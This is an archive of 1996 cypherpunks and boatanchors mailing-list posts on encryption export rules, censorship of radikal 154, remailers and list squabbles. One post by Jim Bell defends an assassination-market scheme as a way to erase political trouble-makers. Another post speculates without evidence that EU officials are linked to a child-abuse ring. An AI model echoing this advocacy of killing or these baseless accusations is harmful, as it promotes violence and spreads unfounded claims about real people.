Forwarded message:
>From boatanchors@theporch.com  Mon Sep 23 14:15:39 1996
Date: Mon, 23 Sep 1996 12:54:28 -0500 (CDT)
Message-Id: <Chameleon.4.01.2.960923135510.jproc@>
Errors-To: listown@jackatak.theporch.com
Reply-To: jproc@worldlinx.com
Originator: boatanchors@theporch.com
Sender: boatanchors@theporch.com
Precedence: bulk
From: jproc@worldlinx.com
To: Multiple recipients of list <boatanchors@theporch.com>
Subject: Crypto Files in the BA Archives
X-Listprocessor-Version: 6.0c -- ListProcessor by Anastasios Kotsikonas
X-Comment: Amateur Radio Equipment Using Vacuum Tubes
Content-Type: TEXT/PLAIN; charset=US-ASCII
Mime-Version: 1.0
X-Mailer: Chameleon - TCP/IP for Windows by NetManage, Inc.

Dear BA'ers,

For those of you in the group who are interested in crypto gear, I have 
posted two files to the BA archives which discuss the KL7 off line crypto 
unit and the KWR-37 online crypto receiver. To obtain the files, send a 
message to:
 
listprocessor@theporch.com

In the body of the message type:

get boatanchors kl7.crypto.unit
get boatanchors kwr37.crypto.receiver

The second article is the one which will be submitted to AWA Old Timers 
Bulletin. BA'ers get to read it first.


Regards,
-------------------------------------
Jerry Proc VE3FAB
E-mail: jproc@worldlinx.com
HMCS Haida Naval Museum
Toronto, Ontario
'Looking for a 'AN/SRC-501' 
-------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Tue, 24 Sep 1996 15:44:38 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: We removed radikal 154 from xs4all :(
In-Reply-To: <ae6c48b904021004a5e5@[207.167.93.63]>
Message-ID: <32470540.6B28@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> At 6:31 PM 9/23/96, tank wrote:
> >Hi all,
> >
> >We have temporary removed radikal 154 from xs4all.
> 
> Unfortunately, this means that Germany wins.

I partially agree, but then again the stuff is mirrored all over the 
place.  While the Germans are off blocking other sites, xs4all can
re-host the material as soon as the Bundesfeds unblock their 
addresses.  Eventually, I suspect it'd get pretty embarrassing for
the censors.

______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wayne H. Allen" <whallen@capitalnet.com>
Date: Tue, 24 Sep 1996 10:53:13 +0800
To: Wearen Life <sbrath@froglit.scitele.com>
Subject: Re: Go away CIA
Message-ID: <199609232104.RAA29874@ginger.capitalnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:45 AM 9/23/96 -0400, Wearen Life wrote:
>The CIA has many powers both great and small. If the can cover up findings
>of UFO's 



    Has this list sunk that low?
Wayne H.Allen
whallen@capitalnet.com
Pgp key at www.capitalnet.com/~whallen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wearen Life <runnerfx@octet.com>
Date: Tue, 24 Sep 1996 10:39:21 +0800
To: "Wayne H. Allen" <whallen@capitalnet.com>
Subject: Re: Go away CIA
In-Reply-To: <199609232104.RAA29874@ginger.capitalnet.com>
Message-ID: <Pine.BSF.3.95.960923170905.11306B-100000@iron.octet.com>
MIME-Version: 1.0
Content-Type: text/plain


Must we go thru this again?

On Mon, 23 Sep 1996, Wayne H. Allen wrote:

> At 08:45 AM 9/23/96 -0400, Wearen Life wrote:
> >The CIA has many powers both great and small. If the can cover up findings
> >of UFO's 
> 
> 
> 
>     Has this list sunk that low?
> Wayne H.Allen
> whallen@capitalnet.com
> Pgp key at www.capitalnet.com/~whallen
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 24 Sep 1996 12:00:22 +0800
To: sameer@c2.net
Subject: Re: We removed radikal 154 from xs4all :(
Message-ID: <ae6c7c9c05021004d6a2@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:22 PM 9/23/96, sameer@c2.net wrote:
>> Unfortunately, this means that Germany wins.
>
>        How does this mean that Germany wins? "radikal 154" is still
>available all over the world, at almost 50 mirror sites, I beleive
>(including http://www.c2.net/radikal/), which are *not* blocked by
>Germany.

Germany went after the most visible site, the _original_ site. That other
sites were mirroring the verboten material did not stop them from blocking
access to xs4all, so Germany clearly still wanted to make an example of
xs4all.

That xs4all eventually capitulated has to be seen as a win for Germany.

(Certainly within the government of Germany, they must be viewing this as a
victory.)

They will probably now turn their sights on other sites (no pun intended),
hoping to pick off each one in turn.

I guess it's the domino theory all over again.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 24 Sep 1996 13:32:56 +0800
To: cypherpunks@toad.com
Subject: Re: We removed radikal 154 from xs4all :(
Message-ID: <ae6c7deb060210042548@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:46 PM 9/23/96, Mike McNally wrote:

>place.  While the Germans are off blocking other sites, xs4all can
>re-host the material as soon as the Bundesfeds unblock their
                                     ^^^^^^^^^^

Beavis and Bundesfed?


--Tim

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: somebody@tempest.ashd.com
Date: Tue, 24 Sep 1996 10:28:53 +0800
To: "Michael E. Carboy" <carboy@hooked.net>
Subject: Re: Snooping ISP admin??
In-Reply-To: <32468D68.5E2@hooked.net>
Message-ID: <Pine.GSO.3.93.960923173918.11839A-100000@tempest.ashd.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Sep 1996, Michael E. Carboy wrote:

> Greetings All,
> 
> Question for the group:  I have encountered a situation that causes me
> to believe an ISP is snoopingthrough encrytped mail.  It seems that
> PGP'd mail has aroused the curiosity of an ISP (not hooked.net).. I have
> encountered "POP3 account in use by another user" several times in the
> past few days and I am the only user... wondering if that "in use"
> messsage is the result of a clumsy sysadmin being caught with his hand
> in the cookie jar.  Any thoughts from the group???  If those more
> knowledgeable than I deem these NOISE... my sincere apologies.
	All I got to say is that if a admin wanted to get your mail using
POP3 would be last thing one would try. Since the admin reign over the
machine he could just copy your mail file and do what he wishes at this
point. Besides most admins including myself really want to bother talking
to users most of the time let alone read there mail.

							Carlos





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 24 Sep 1996 11:51:19 +0800
To: cypherpunks@toad.com
Subject: Re: Bernstein hearing: The Press Release
Message-ID: <ae6c7e8a070210044a9c@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:59 PM 9/23/96, Lucky Green wrote:
>As long as the person that you are speaking to is employed in any way,
>workplace issues apply. Even if you talk to the person after work and away
>from their place of employment. The courts have ruled that the speech does
>not have to occur at the workplace to be prohibited. All that is required
>is that the person is affected at the workplace.
>
>Yes, you can be sued for sexual harrasment for trying to pick up a
>stranger in a bar, should that stranger still feel bothered by your
>advances while at work the next day.
>
>The courts have ruled,

I don't believe this is so.

Oh, I believe anybody can sue for anything, but the courts don't have to
allow the case to proceed. In this example, it wouldn't get far.

While I have objections to the overbroad (no pun intended) way many "sexual
harassment" cases have been handled, essentially all of the cases I have
heard about have involved employees and/or management within a company. For
example, women feeling put upon by "tool girl" calendars in some offices,
or women being "looked at inappropriately" by fellow employees. (Plus the
more-legitimate complaints, such as being groped in the hallways, being
told to hit the sheets or hit the streets, etc.)

I don't for a nanosecond believe your example would ever reach a court,
civil or criminal. Whom, for example, would the offended party sue? The
employer, who had absolutely no involvement, or the stranger in the bar?
While there are _stalking_ laws, if the stranger's behavior got extreme
enough, there are no laws about trying to get a date. Nor are there any
grounds for a person claiming a casual question provoked a mental trauma,
blah blah blah.

If this topic comes up again in ten years, things may've changed, of
course. I'm not hopeful about the direction things are going.

--Tim May




We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 24 Sep 1996 05:33:08 +0800
To: cypherpunks@toad.com
Subject: PKI_gak
Message-ID: <199609231748.RAA03243@pipe2.ny2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-21-96. MiPa: 
 
   System and method for centralized session key 
   distribution, privacy enhanced messaging and information 
   distribution using a split private key public 
   cryptosystem (Assignee -- Bell Atlantic Network Services, 
   Inc.)  
 
   The method and system also provide for authorized 
   wiretapping, video and data distribution and private 
   enhanced messaging (PEM). 
 
   ----- 
 
   http://jya.com/pkigak.txt  (4 kb) 
 
   PKI_gak 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@vesuvius.ai.mit.edu
Date: Tue, 24 Sep 1996 10:39:05 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: AP [was: Re: Kiddie porn on the Internet] [NOISE]
In-Reply-To: <199609230102.SAA01161@mail.pacifier.com>
Message-ID: <9609232148.AA17056@vesuvius.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



So Jim Bell is opposed to "truly random attacks on ordinary citizens"
Its this type ofappoligia for terrorism that disgusts me utterly.

He is calling for murder but wants to dress it up in whatever psychotic
justifications he can.

He is also completely wrong. When the IRA attemoted to assasinate my cousin
I was in no way intimidated and neither was he. He continued as a senior
poitician for over a decade despite continued danger. I can think of no
less effective method of bringing about change in attitudes.

I am in no way intimidated by Bell either. He is a kook and I don;t think it
he is worth further consideration.

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 24 Sep 1996 05:45:55 +0800
To: cypherpunks@toad.com
Subject: TAG_ent
Message-ID: <199609231749.RAA03296@pipe2.ny2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   09-21-96, MiPa: 
 
   Trusted agents for open electronic commerce (Assignee -- 
   Citibank, N.A.) 
 
   Abstract: A system for open electronic commerce having a 
   customer trusted agent securely communicating with a 
   first money module, and a merchant trusted agent securely 
   communicating with a second money module. Both trusted 
   agents are capable of establishing a first 
   cryptographically secure session, and both money modules 
   are capable of establishing a second cryptographically 
   secure session. 
 
   ----- 
 
   http://jya.com/tagent.txt  (3 kb) 
 
   TAG_ent 
 
--------- 
 
   Reuters, 9-19-96 -- It will be 50 to 70 years before the 
   majority of people do their business electronically, 
   Citicorp Chairman John Reed told a conference on 
   electronic money and banking. Issues related to privacy 
   and security must be resolved for electronic banking to 
   take off. Citicorp currently considers the Internet 
   off-limits as a place to offer banking products until the 
   security issues are solved, he said. "The Internet is 
   fundamentally flawed in that regard right now," Reed 
   said. "At this moment in time at least, we at Citicorp 
   would feel very uncomfortable accommodating any 
   transactions on the Internet," he said. 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 24 Sep 1996 11:03:21 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Mercenaries
In-Reply-To: <ae6b6f8f06021004fe67@[207.167.93.63]>
Message-ID: <Pine.BSF.3.91.960923175302.4532B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> _Almost_ more important to me than "libertarian" ideals are "consistency"
> ideals: namely, that there oughtn't to be laws which are not enforced, or
> which are too expensive to enforce, or which can be selectively enforced.
> And since I know that the full suite of laws, all 25,000 or 45,000 of them
> (on all 27 linear feet of bookshelf space) cannot possibly be consistently
> enforced, I favor a "minimalist" or "fallback" position of having
> relatively few laws, covering mostly "crimes" which are more easily
> detected and prosecuted (with draconian punishments).

Nice idea, but it will never happen. All those laws are the result of two 
things; law makers, who feel they are elected and paid to make laws, and 
the sort of people who feel they have the "right" (legal, moral, who 
knows?) to do whatever isn't strictly prohibited.

-r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 24 Sep 1996 05:49:59 +0800
To: cypherpunks@toad.com
Subject: Re: Bernstein hearing: The Press Release
In-Reply-To: <Pine.SUN.3.91.960923065805.28623E-100000@eff.org>
Message-ID: <199609231808.MAA09908@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


In <Pine.SUN.3.91.960923065805.28623E-100000@eff.org>, on 09/23/96 
   at 07:23 AM, Declan McCullagh <declan@eff.org> said:

= .Clearly, speech that makes someone uncomfortable must be banned by
= .the  government.

= .-Declan

        is that what you really meant?  pretty liberal is it not?

        this gives in to the notion that if I'm standing on the street
    corner with a friend discussing anarchistic libertarian theory,
    and the proverbial fat lady waiting to cross the street has
    her 'common sense' offended and sings...

        this is what that big government liberal philosophy (and not
    just tax and spend) --regulation, and more regulation. they have
    already 'revised' in the name of political correctness even 
    history.  

        not withstanding that 'to the victor goes the spoils and the 
    rewriting of history,' the Feds have already brainwashed the last
    generation of school children, using the very element of society
    who disdained the government --the 60s liberal.

        I dunno, declan,  I did not really perceive you as a brain-
    washed, brain dead liberal.  if what you stated above is true, it
    is totally opposite to your stand on freedom of speech and the
    CDA.

        care to mitigate that statement or defend it in terms of free
    speech?

--
  O, what a fall there was, my countrymen!
    Then I, and you, and all of us fell down,
    Whilst bloody treason flourish'd over us.
        -- Shakespeare  (Julius Caesar)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 24 Sep 1996 10:42:17 +0800
To: Anonymous <nobody@replay.com>
Subject: Re: The periodic word of advice about Timmy C. Maypole, the pathological liar
In-Reply-To: <199609231805.UAA28245@basement.replay.com>
Message-ID: <Pine.BSF.3.91.960923180014.4532D-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 23 Sep 1996, Anonymous wrote:

> as the Russian sailor was the one who satisfied her the 
> most.  ^^^^^^^ 


Ah, now we're getting somewhere ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 24 Sep 1996 12:18:59 +0800
To: cypherpunks@toad.com
Subject: Has the list sunk this low?
Message-ID: <ae6c82a009021004404b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:04 PM 9/23/96, Wayne H. Allen wrote:
>At 08:45 AM 9/23/96 -0400, Wearen Life wrote:
>>The CIA has many powers both great and small. If the can cover up findings
>>of UFO's
>
>
>
>    Has this list sunk that low?

The list is like a social club, except with more than 1000 members all able
to speak up at any time, on any subject.

The random babblings of any one person mean little about what other people
think. It's a cognitive error to assume the list has some "level" it can
sink to, or rise to, or whatever.

The best way to improve the S/N ratio is to post good signal, to find
topics of interest and then write about them.

--Tim May

(P.S. I've removed these names from the distribution list:
firewalls@GreatCircle.COM, Wearen Life <runnerfx@octet.com>, Shane Brath
<sbrath@froglit.scitele.com>, Skeeve Stevens <skeeve@skeeve.net>. I again
urge people to try to trim the distribution list.)

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: haggis@brutus.bright.net (Hamish)
Date: Tue, 24 Sep 1996 10:24:54 +0800
To: cypherpunks@toad.com
Subject: Taking crypto out of the U.S.
Message-ID: <v01540b00ae6c79f1fbfd@[205.212.124.167]>
MIME-Version: 1.0
Content-Type: text/plain


        Soon I am going to be going overseas to Japan, and I want to take
my notebook with me so I can keep up with everything, however, I have
encrypted my hard drive and usually encrypt my mail.  Is this in violation
of the ITAR to keep everything the same when I go over?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Geoffrey KEATING <geoffk@discus.anu.edu.au>
Date: Mon, 23 Sep 1996 19:24:47 +0800
To: gbroiles@netbox.com
Subject: Re: Macintosh Mixmaster port...  Who's doing it?
In-Reply-To: <3.0b19.32.19960922162606.006c1644@ricochet.net>
Message-ID: <199609230818.SAA00330@discus.anu.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


> Date: Sun, 22 Sep 1996 16:26:11 -0700
> From: Greg Broiles <gbroiles@netbox.com>

> At 03:16 PM 9/22/96 -0500, Adam Shostack wrote:
...
> I'm pottering around with a Java-based remailer that acts like a POP client
> so it can run on a client machine, not a Unix box; but other people should
> take that as a challenge to see if they can finish one before/better than
> me, not a reason to avoid writing one. Hal Finney has already done some
> very nice work with Java and mailing; see his home page (the address of
> which I don't have immediately at hand) for more details. 

Hal is at http://www.portal.com/~hfinney/ .

I have a prototype PGP-encryption implementation in Java, which I was
intending to build into a remailer _client_ (I think remailers
themselves will be better written in C for performance reasons, or at
least the crypto portions); at first, for 'type I' remailers, then
perhaps for mixmaster.

The prototype, which just encrypts to a public key, has been put at
http://www.ozemail.com.au/~geoffk/pke/ .  I'd appreciate people
looking over it, particularly the random number generation.

[The prototype is actually somewhat useful. It's about as secure as
downloading PGP in binary form... ]
-- 
-Geoff Keating (geoffk@ozemail.com.au, Geoff.Keating@anu.edu.au)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Tue, 24 Sep 1996 06:11:58 +0800
To: cypherpunks@toad.com
Subject: Re: More proposals for European censorship
In-Reply-To: <199609231433.QAA20666@slld01.SLL.SE>
Message-ID: <Pine.HPP.3.91.960923180823.12499A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Sep 1996, Peter Trei wrote:

> > It's probably no coincidence that the recently busted, utter horrible
> > child-molesting ring, with obvious protection from various persons
> > in the establishment, was centered in Belgium - that's where the EU
> > bureaucrat nomenklatura play their power games and go to bordellos.

> What exactly are you suggesting when you say 'it's probably no
> coincidence?" I can't quite figure it out.

Obviously not only the arrested killer used the schoolgirls chained
in underground cells. They were for hire. High officials used his
'services', then ordered the police to cover it up. Why else would
some ten policemen be arrested? The EU bureaucrats are served by
hordes of prostitutes. Surely there are pedophiles among the hordes.
Probably some EU pedophiles have a connection to the gang. I don't
know this of course, but speculation is cheap.

Asgaard 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Tue, 24 Sep 1996 06:11:30 +0800
To: cypherpunks@toad.com
Subject: Re: provably hard PK cryptosystems
In-Reply-To: <ae6b6083050210047554@[207.167.93.63]>
Message-ID: <Pine.HPP.3.91.960923182407.12499B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Sep 1996, Timothy C. May wrote:

> Suppose a tile is placed at some place on the grid, and another tile
> (possibly a different tile, possibly the same type of tile) is placed some
> distance away on the grid. The problem is this: Can a "domino snake" be
> found which reaches from the first tile to the second tile, with the
> constraint that edges must match up on all tiles? (And all tiles must be in
> normal grid locations, of course)

Intuitively (but very well not, I'm not informed enough to know)
this might be a suitable problem for Hellman's DNA computer, the
one used for chaining the shortest route including a defined
number of cities?

Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Geoffrey KEATING <geoffk@discus.anu.edu.au>
Date: Mon, 23 Sep 1996 22:50:56 +0800
To: cjh@osa.com.au
Subject: Re: (Fwd) Australian "ITAR" regulations
In-Reply-To: <199609230132.LAA08960@rosella.osa.com.au>
Message-ID: <199609230830.SAA00374@discus.anu.edu.au>
MIME-Version: 1.0
Content-Type: text/plain



> Peter Trei writes:
> > Forwarded from the cypherpunks list...
> > http://www.austlii.edu.au/cgi-bin/sinodisp.pl/au/legis/cth/consol_reg/cer439/sch13.html?query=cryptographic
> 
> Thanks for posting this URL Peter.  Of particular note is the heading:
> 
> > 43.       Other goods as follows:
> 
> An anonymous opinion from inside the Defence Dept holds that electronic
> bits on a wire do not constitute goods, and as a result if you ship
> electronically, you are not subject to the regulations.  If you ship a
> CD or floppy or other physical media containing software, you violate the
> regulations.

If you glance at reg. 13b, under 'software', you'll find that it
specifically says '"software" means [program(s)] fixed in any tangible
medium of expression'.

-- 
-Geoff Keating (Geoff.Keating@anu.edu.au)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 24 Sep 1996 15:46:29 +0800
To: hallam@vesuvius.ai.mit.edu
Subject: Re: AP [was: Re: Kiddie porn on the Internet] [NOISE]
Message-ID: <199609240135.SAA23298@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:48 PM 9/23/96 -0400, hallam@vesuvius.ai.mit.edu wrote:
>
>So Jim Bell is opposed to "truly random attacks on ordinary citizens"
>Its this type ofappoligia for terrorism that disgusts me utterly.
>He is calling for murder but wants to dress it up in whatever psychotic
>justifications he can.
>He is also completely wrong. When the IRA attemoted to assasinate my cousin
>I was in no way intimidated and neither was he. He continued as a senior
>poitician for over a decade despite continued danger. I can think of no
>less effective method of bringing about change in attitudes.

And he, along with others, failed to solve the problems as well.  Is this progress?


>I am in no way intimidated by Bell either. He is a kook and I don;t think it
>he is worth further consideration.
>	Phill


For the record, if an AP-type system were to operate it would:

1.  Make it impossible for the British to continue to station troops in 
Northern Ireland, an eventuality that I suppose Phill resists.

However, it would also:

2.  Make it impossible and unnecessary for the British to have any troops 
anywhere, because it would eliminate  its government and military.  It would 
no longer be a country, merely an island with people living there.

3.  Make it unnecessary in Northern Ireland to protect the Catholics from 
the Protestants, or the Protestants from the Catholics,  because the 
trouble-makers from both (all?) sides would be quickly erased from the 
scene.  Nobody would rule anybody. Nobody COULD rule anybody.  All factions 
would either be peaceful or dead, their choice.  No political advantage could be 
gained by violence, because all politics would have ceased.

4.  Make it unnecessary and pointless for Northern Ireland to re-unify with 
Ireland, because likewise the government and military of Ireland would 
dissolve, as well as all political structure in that land as well.


In short, the only reasons that the current problems are maintained in 
Northern Ireland and Britain would be eliminated by the advent of AP.

So who is the "kook," really?




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 24 Sep 1996 12:20:15 +0800
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: possible solution to cyber S/N
In-Reply-To: <199609231847.LAA29832@netcom5.netcom.com>
Message-ID: <199609232354.SAA00523@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Vladimir Z. Nuri wrote:
> 
> taking this idea to the cyberspace arena, the application is
> immediately obvious-- pages that are linked to by a lot of 
> other pages are valuable, those that are not are not as
> valuable.
> 

The above is wrong from two standpoints: 

Locally: if my taste is sufficiently different from that of other people,
why should I follow their preferences?

Globally: Vladimir's recommendations lead to a vicious circle of
"tyranny" of popular sites because hte more people view a site, the more
will follow and the site's "attractiveness" rating will go even higher.

It is similar to a recommendation to buy stocks when they are rising.
If enough people follow it, stock crashes like in 1929 are imminent.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Tue, 24 Sep 1996 10:49:02 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Dimitri Spams
In-Reply-To: <VDNkuD2w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.960923190845.19887A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Sep 1996, Dr.Dimitri Vulis KOTM wrote:



> Ray Arachelian <sunder@brainlink.com> writes:
> 
> > Dimitri, get a life!  We need Dimitri Spams as much as we needed 
> > Perrygrams.  Which is to say, we need them not at all!
> 
> I see you lied when you claimed to have killfiled me.

Watch your attribution there Mr. Detweiler, I never said I killfiled 
you.  I don't kill file people.  I DELETE them. <evil grin>

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to   |KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK   |AK|        do you not understand?       |=======
===================http://www.brainlink.org/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Tue, 24 Sep 1996 11:19:28 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Bernstein hearing: The Press Release
In-Reply-To: <Pine.3.89.9609231440.A14516-0100000@netcom9>
Message-ID: <32472AF1.1417@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
>
> Yes, you can be sued for sexual harrasment for trying to pick up a
> stranger in a bar, should that stranger still feel bothered by your
> advances while at work the next day.
> 
> The courts have ruled,

To paraphrase the probably-great Charles Haynes, "my bullshit meter 
is jiggling up near the red line".  Is there really a case of a person
being convicted of workplace sexual harassment against somebody they
didn't work with?



[ Yes, I realize that civil law makes very little sense sometimes. ]

______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Krenn <krenn@nym.alias.net>
Date: Tue, 24 Sep 1996 10:43:47 +0800
To: cypherpunks@toad.com
Subject: Re: Snake-Oil FAQ
Message-ID: <199609232331.TAA15378@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Tim May wrote:
> The reason I recommend anonymous remailer distribution, and pseudonyms, is
> because of the litigation issue. Even if reviewers are not sued often, the
> threat of a suit influences reviews, which is why most reviews in most mags
> are puff pieces (glowing reviews, often strongly correlated with who is
> advertising in the mag). One can imagine Matt Blaze, for example, choosing
> to say _nothing_ about SnakeTronics' ScrambleMatic, for fear (justified)
> that he might get letters from their lawyers, thus taking up his time and
> even eventually landing him in court.

I agree, hence my original post. I for one would not contribute to such
a list without anonymity, tho my critiques might be right. The hassle of
dealing with a person or organization bent on causing you legal headache
is more than I am willing to deal with. It is obvious, given the current 
state of the legal system in this country, that a lawsuit against a
even a well-respected cryptographer might drag on for some time, costing 
ennumerable dollars and hours, and _might_ even succeed.

Krenn

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMkcaT0nqfwPpt/QVAQHzJwP/VG1E60TeZ8xtomW2VmKO/b/jV+a6orWT
ebxhtlCX6CicVYtS0L4NBqcY8rQk8bcbeMXed3o5tY7B4FHwANml9Ubcbg7Wo7yL
2JvWI2E6M/4yfKIPuO0aqId57Qx5v36RiDAjZsozKhOJERTGasFJCOFOu/pMOa6M
36lWaXY0tyg=
=PTUE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 24 Sep 1996 18:09:04 +0800
To: Shane Brath <sbrath@froglit.scitele.com>
Subject: Re: Go away CIA
Message-ID: <199609240242.TAA28421@dfw-ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:32 PM 9/22/96 -0500, Shane Brath <sbrath@froglit.scitele.com> wrote:
>On Sat, 21 Sep 1996, Wearen Life wrote:
>> I wont be suprised if they where ALSO watching who was visting your page.

>But how would they go about globaly watching who goes to your URL, unless 
>they hack into your server and look at the log, or have a network sniffer 
>at a access point feeding you?

1) Spooks can do anything :-)

2) Network Solutions Inc., who runs the NIC, is run by spooks.
While they don't run all the root-level domain name servers,
they influence most of the US ones.  It wouldn't be surprising if they
can track DNS requests to the root servers, which would let them find
which ISPs are looking for the addresses of which second-level domains.
This isn't very informative when somebody at aol.com wants an address of
compuserve.com (which will get cached at aol.com's DNS server anyway),
but tells them a lot more when small-isp.com asks for skeeve.net's address,
especially when they know which Usual Suspects are at small-isp.com .

3) Added-paranoia mode, for people who believed 2) :-)
Suppose you've got a vanity domain name, like skeeve.net, and
they really want to track you.  So they hack the data in the .net
nameserver to respond to requests for skeeve.net with
198.81.129.94, which tells you that www.skeeve.net is 191.127.0.42,
which runs an http server that fetches the information from
